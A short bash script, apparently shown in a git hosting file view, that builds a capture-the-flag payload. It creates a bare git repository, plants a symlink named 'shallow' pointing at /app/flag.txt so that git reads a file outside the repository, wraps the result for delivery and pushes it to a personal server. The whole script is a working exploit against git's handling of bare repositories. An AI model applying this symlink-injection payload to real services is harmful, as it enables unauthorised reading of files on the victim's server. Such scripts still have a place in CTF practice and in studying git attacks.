35 lines
774 B
Bash
Executable File
35 lines
774 B
Bash
Executable File
# 1. Create the base repository with a commit
|
|
mkdir base_repo && cd base_repo
|
|
git init
|
|
git commit --allow-empty -m "init"
|
|
cd ..
|
|
|
|
# 2. Create the bare clone (the payload)
|
|
git clone --bare base_repo malicious.git
|
|
|
|
# 3. Inject the symlink
|
|
cd malicious.git
|
|
ln -s /app/flag.txt shallow
|
|
|
|
# 4. Force Git to track the refs directories
|
|
mkdir -p refs/heads refs/tags
|
|
touch refs/.keep
|
|
touch refs/heads/.keep
|
|
touch refs/tags/.keep
|
|
cd ..
|
|
|
|
# 5. Wrap it for delivery
|
|
mkdir wrapper && cd wrapper
|
|
git init
|
|
cp -r ../malicious.git .
|
|
git add malicious.git
|
|
git commit -m "Delivery package with refs tracked"
|
|
|
|
# 6. Push to your server
|
|
git branch -M main
|
|
git remote add origin ssh://git@gitea.cato447.de:222/cato447/pwn.git
|
|
git push -u origin main -f
|
|
cd ..
|
|
|
|
rm -rf base_repo malicious.git wrapper
|